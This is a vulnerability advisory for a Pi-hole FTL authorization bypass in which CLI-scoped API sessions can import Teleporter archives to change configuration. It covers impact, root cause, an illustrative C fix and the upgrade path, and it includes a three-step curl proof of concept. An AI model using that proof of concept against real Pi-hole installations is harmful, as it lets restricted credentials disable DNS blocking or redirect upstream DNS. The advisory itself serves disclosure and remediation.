Summary
| Field | Value |
|---|---|
| CVE ID | CVE-2026-35491 |
| Advisory | GHSA-r7g8-3fj7-m5qq |
| Vulnerability Type | Authorization Bypass |
| CWE | CWE-863: Incorrect Authorization |
| Attack Vector | Local |
| CVSS v3.1 Base Score | 6.1 (Medium) |
| CVSS v3.1 Vector | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L |
| Affected Versions | Pi-hole FTL >= 6.0 through 6.5 |
| Patched Version | 6.6 |
| Discovered By | Mohammed Alzahrani |
Description
Pi-hole FTL versions 6.0 through 6.5 contain an authorization bypass in the Teleporter import endpoint. CLI-scoped API sessions — intended for read-only operations — are properly rejected by /api/config with HTTP 403, but the /api/teleporter endpoint lacks equivalent authorization checks.
This inconsistency allows an attacker with CLI credentials to import a Teleporter archive and modify Pi-hole’s configuration, despite the session type being restricted from direct config changes.
Impact
An attacker with CLI credentials can:
- Reconfigure Pi-hole — disable DNS blocking, change upstream DNS servers, alter DHCP settings
- Integrity violation — configuration changes take effect and trigger a system restart
- Availability impact — DNS resolution behavior can be silently altered or disrupted
Proof of Concept
Step 1 — Authenticate with CLI credentials to obtain a session ID:

```bash
curl -s -X POST 'http://<PIHOLE_IP>/api/auth' \
  -H 'Content-Type: application/json' \
  --data '{"password":"<cli_password>"}'
```

Step 2 — Confirm the CLI session is blocked from direct config changes (expect HTTP 403):

```bash
curl -s -X PATCH 'http://<PIHOLE_IP>/api/config' \
  -H 'Content-Type: application/json' \
  -H 'X-FTL-SID: <session_id>' \
  --data '{"dns":{"blocking":false}}'
# Returns: 403 Forbidden
```

Step 3 — Import a Teleporter archive using the same restricted session (succeeds):

```bash
curl -s -X POST 'http://<PIHOLE_IP>/api/teleporter' \
  -H 'X-FTL-SID: <session_id>' \
  -F 'file=@modified_config.tar.gz'
# Returns: 200 OK — configuration applied, system restarts
```
The import succeeds and configuration changes take effect, bypassing the authorization restriction enforced on /api/config.
Root Cause
The `/api/teleporter` endpoint does not check whether `api->session->cli` is true before processing import requests. The fix in v6.6 applies the same CLI session rejection logic used in `/api/config` to the Teleporter import handler.
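The fix pattern described above, as an added illustration that is not FTL's own code: a hypothetical route table in which the CLI-session rejection is enforced once in the dispatcher rather than repeated in each handler, so `/api/teleporter` and `/api/config` cannot diverge again. The struct, route and function names are assumptions; only the `session->cli` flag named in the advisory is taken from the page.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-ins for FTL's session/request types (not the real ones);
 * only the session->cli flag from the advisory is modelled. */
struct session { bool valid; bool cli; };
struct request { const char *method; const char *uri; struct session *session; };

enum { HTTP_OK = 200, HTTP_UNAUTHORIZED = 401, HTTP_FORBIDDEN = 403, HTTP_NOT_FOUND = 404 };

/* Handlers do no real work here; reaching them means authorization passed. */
static int handle_config(const struct request *r)     { (void)r; return HTTP_OK; }
static int handle_teleporter(const struct request *r) { (void)r; return HTTP_OK; }

/* Route table. The writes_config column, not each handler, decides whether a
 * CLI-scoped session is rejected: a new config-changing endpoint cannot be
 * registered without declaring it, and none can forget the check. */
struct route {
    const char *method;
    const char *uri;
    bool writes_config;
    int (*handler)(const struct request *);
};
static const struct route routes[] = {
    { "PATCH", "/api/config",     true, handle_config },
    { "POST",  "/api/teleporter", true, handle_teleporter },
};

/* Central dispatch: authenticate, then apply session-scope rule, then call handler. */
int dispatch(const struct request *r) {
    if (r->session == NULL || !r->session->valid) return HTTP_UNAUTHORIZED;
    for (size_t i = 0; i < sizeof routes / sizeof routes[0]; i++) {
        const struct route *rt = &routes[i];
        if (strcmp(rt->method, r->method) != 0 || strcmp(rt->uri, r->uri) != 0) continue;
        /* CLI sessions are read-only: refuse every config-writing route alike,
         * which is the behaviour the 6.6 fix restores for the Teleporter import. */
        if (rt->writes_config && r->session->cli) return HTTP_FORBIDDEN;
        return rt->handler(r);
    }
    return HTTP_NOT_FOUND;
}
```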
Remediation
Update Pi-hole FTL to version 6.6 or later:

```bash
pihole -up
```
If immediate update is not possible, restrict access to the Pi-hole web interface and API to trusted network segments only.
References
Discovered and reported by Mohammed Alzahrani.